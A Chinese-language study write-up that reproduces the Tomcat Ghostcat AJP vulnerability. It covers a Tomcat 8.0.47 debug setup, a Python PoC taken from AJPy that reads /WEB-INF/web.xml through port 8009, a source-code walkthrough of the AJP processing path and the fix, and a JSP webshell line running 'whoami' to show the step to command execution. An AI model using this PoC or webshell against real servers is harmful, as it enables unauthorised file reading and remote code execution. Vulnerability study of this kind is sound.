最近在从零开始学习java安全,而前端时间tomcat的ghostcat漏洞比较火,这次就尝试的复现一下,如果有错误希望师傅们可以指出
由于要调试tomcat,所以需要下载源码,这次我用到的版本是8.0.47
<?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> <groupId>org.apache.tomcat</groupId> <artifactId>Tomcat8.0</artifactId> <name>Tomcat8.0</name> <version>8.0</version> <build> <finalName>Tomcat8.0</finalName> <sourceDirectory>java</sourceDirectory> <testSourceDirectory>test</testSourceDirectory> <resources> <resource> <directory>java</directory> </resource> </resources> <testResources> <testResource> <directory>test</directory> </testResource> </testResources> <plugins> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-compiler-plugin</artifactId> <version>2.3</version> <configuration> <encoding>UTF-8</encoding> <source>1.8</source> <target>1.8</target> </configuration> </plugin> </plugins> </build> <dependencies> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>4.12</version> <scope>test</scope> </dependency> <dependency> <groupId>org.easymock</groupId> <artifactId>easymock</artifactId> <version>3.4</version> </dependency> <dependency> <groupId>ant</groupId> <artifactId>ant</artifactId> <version>1.7.0</version> </dependency> <dependency> <groupId>wsdl4j</groupId> <artifactId>wsdl4j</artifactId> <version>1.6.2</version> </dependency> <dependency> <groupId>javax.xml</groupId> <artifactId>jaxrpc</artifactId> <version>1.1</version> </dependency> <dependency> <groupId>org.eclipse.jdt.core.compiler</groupId> <artifactId>ecj</artifactId> <version>4.5.1</version> </dependency> </dependencies> </project>
在目录下创建一个名为 catalina-home
的文件夹将目录下的 webapp
和 conf
复制进去,之后再创建 logs
, lib
, temp
, work
文件夹,共六个
导入IDEA后,开始自动下载
若未自动下载则
红色箭头处
如果出现有报错cannot resolve xxx包的话,就点击红色箭头
然后点击此处,重写reimport一下即可
util.TestCookieFilter
注释掉,不然会报错 在 org.apache.catalina.startup.ContextConfig
添加 context.addServletContainerInitializer(new JasperInitializer(), null);
配置tomcat
Main class:org.apache.catalina.startup.Bootstrap
VM options:
-Dcatalina.home=catalina-home -Dcatalina.base=catalina-home -Djava.endorsed.dirs=catalina-home/endorsed -Djava.io.tmpdir=catalina-home/temp -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.util.logging.config.file=catalina-home/conf/logging.properties
由于发现者是长亭的师傅们然后poc又被集成在了他们的扫描器中,我又懒得像别的师傅那样抓包,所以最后在github上寻找到了poc
观察漏洞爆出前后的github更新情况
默认关闭了AJP connector
无法识别的属性直接403
poc 地址 https://github.com/hypn0s/AJPy/
由于这个脚本有很多功能,最后我就把这次漏洞需要的提取出来
import sys from ajpy.ajp import AjpResponse, AjpForwardRequest, AjpBodyRequest, NotFoundException from tomcat import Tomcat gc = Tomcat('127.0.0.1', 8009) file_path = "/WEB-INF/web.xml" attributes = [ {"name": "req_attribute", "value": ("javax.servlet.include.request_uri", "/",)}, {"name": "req_attribute", "value": ("javax.servlet.include.path_info", file_path,)}, {"name": "req_attribute", "value": ("javax.servlet.include.servlet_path", "/",)}, ] hdrs, data = gc.perform_request("/", attributes=attributes) output = sys.stdout for d in data: try: output.write(d.data.decode('utf8')) except UnicodeDecodeError: output.write(repr(d.data))
修改filepath就可以实现任意文件读取
Tomcat在server.xml中配置了两种连接器。
<!-- Define a non-SSL/TLS HTTP/1.1 Connector on port 8080 --> <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" /> <!-- Define an AJP 1.3 Connector on port 8009 --> <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
第一个连接器监听8080端口,负责建立HTTP连接。在通过浏览器访问Tomcat服务器的Web应用时,使用的就是这个连接器。
第二个连接器监听8009端口,负责和其他的HTTP服务器建立连接。在把Tomcat与其他HTTP服务器集成时,就需要用到这个连接器。AJP连接器可以通过AJP协议和一个web容器进行交互。
这里什么意思呢,比如说你的apache又在运行php站点,又在运行py站点,还在运行tomcat,这样访问tomcat就要经过AJP来进行转发访问(且暂时来说也就apache还算支持,这个协议使用不是很多)
Connector用于接受请求并将请求封装成Request和Response,然后交给Container进行处理,Container处理完之后再交给Connector返回给客户端
ProtocolHandler
包含三个部件: Endpoint
、 Processor
、 Adapter
。
Endpoint
用来处理底层Socket的网络连接, Processor
用于将 Endpoint
接收到的Socket封装成Request, Adapter
用于将Request交给 Container
进行具体的处理。 Endpoint
由于是处理底层的Socket网络连接,因此 Endpoint
是用来实现TCP/IP协议的,而 Processor
用来实现HTTP协议的, Adapter
将请求适配到Servlet容器进行具体的处理。 Endpoint
的抽象实现类AbstractEndpoint里面定义了Acceptor和AsyncTimeout两个内部类和一个Handler接口。Acceptor用于监听请求,AsyncTimeout用于检查异步Request的超时,Handler用于处理接收到的Socket,在内部调用 Processor
进行处理。 Adapter
将请求适配到Servlet容器进行具体的处理,这里的Servlet就是属于Container中的Wrapper
我们直接从 processor
开始看, endpoint
如何接受socket这里对漏洞并不是关键,重点在于 processor
封装时发生了什么
org/apache/coyote/ajp/AbstractAjpProcessor.java
public SocketState process(SocketWrapper<S> socket) throws IOException { .....(都是从socket中去取数据是否有报错之类的) if (!getErrorState().isError()) { // Setting up filters, and parse some request headers rp.setStage(org.apache.coyote.Constants.STAGE_PREPARE); try { prepareRequest();(关键点步入) } catch (Throwable t) { ExceptionUtils.handleThrowable(t); getLog().debug(sm.getString("ajpprocessor.request.prepare"), t); // 500 - Internal Server Error response.setStatus(500); setErrorState(ErrorState.CLOSE_CLEAN, t); getAdapter().log(request, response, 0); } }
prepareRequest类
从request中读取各类信息,比如method,protocol,url,host,addr, headers 等
当我们从头部信息中读取各类参数,如果要进入分支则需要未使用预定义的属性
{"name": "req_attribute", "value": ("javax.servlet.include.request_uri", "/",)}, {"name": "req_attribute", "value": ("javax.servlet.include.path_info", file_path,)}, {"name": "req_attribute", "value": ("javax.servlet.include.servlet_path", "/",)},
就正式进入了runtime,为我们后面使用埋下伏笔
这里有个判断,如果设置了secret则返回403
我们仔细思考上面这两个,联系github的修复就发现,都是一一针对的,首先
不再列表中的属性你就不能设置了,直接返回403,其次就是你必须设置secret,你没设置不是跳过判断,而是直接403
判断你要访问的URI是否以http开头,显然不是,然后就进入到Adapter了
知识补充:URI和URL不是一个东西,URL是URI的子集。
你可能觉得URI和URL可能是相同的概念,其实并不是,URI和URL都定义了资源是什么,但URL还定义了该如何访问资源。URL是一种具体的URI,它是URI的一个子集,它不仅唯一标识资源,而且还提供了定位该资源的信息。URI 是一种语义上的抽象概念,可以是绝对的,也可以是相对的,而URL则必须提供足够的信息来定位,是绝对的。
我们一路跟进来到
@Override public void service(org.apache.coyote.Request req, org.apache.coyote.Response res) throws Exception { Request request = (Request) req.getNote(ADAPTER_NOTES); Response response = (Response) res.getNote(ADAPTER_NOTES); ...... if (connector.getXpoweredBy()) { //(AJP/1.3)确定了这是属于谁的Connector response.addHeader("X-Powered-By", POWERED_BY); }
这里的Request和Reponse其实是一个转换的过程,从 org.apache.coyote.Request
转换到 connector.Request
和 connector.Response
:
* 由于要和Servlet进行通信必须要实现`javax.servlet.http.HttpServletRequest`的接口,但是`org.apache.coyote.Request`没有实现,所以只能进行能一次转换
步入 postParseSuccess = postParseRequest(req, request, res, response);
/path;name=value;name2=value2/
这样的情况还会解析出参数 /../
, /
等不合法参数 internalMap
方法,传入host,uri,version,并将最终结果保存在request的mappingData里面, internalMap
这个方法中包含了路由映射的完整过程,HOST,Content,Wrapper(这里用的是最长前缀匹配法)具体可见 https://blog.csdn.net/TMRsir/article/details/78214714 下面就是调用Container的核心步骤了
connector.getService().getContainer().getPipeline().getFirst().invoke(request, response);
这里是按照上面的container的包含顺序在invoke函数不断的选择(选择的方式就是通过之前确定的路由映射,然后跟本次的请求进行匹配)
2. 选取content
初始化Servlet
在Servlet中才会真正处理请求,不过之后还有点初始化过滤器等
WebResource resource = resources.getResource(path);
读取出内容之后,写入response结束 我们在webapps下放置一个木马,hahah.txt
<% out.println(new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec("whoami").getInputStream())).readLine()); %>
然后访问一个不存在的jsp文件
warpper
的时候,会出现从默认的改成jsp(由于URI是jsp结尾)
wrapper
的改变也导致了 Servlet
的选取发生了改变,变为了 JspServlet
catalina-home/work/Catalina/localhost/ROOT/org/apache/jsp/XXXX.java
https://blog.csdn.net/yekong1225/article/details/81000446
https://www.jianshu.com/p/3059328cd661
https://blog.csdn.net/TMRsir/article/details/78214714
https://www.guildhab.top/?p=2406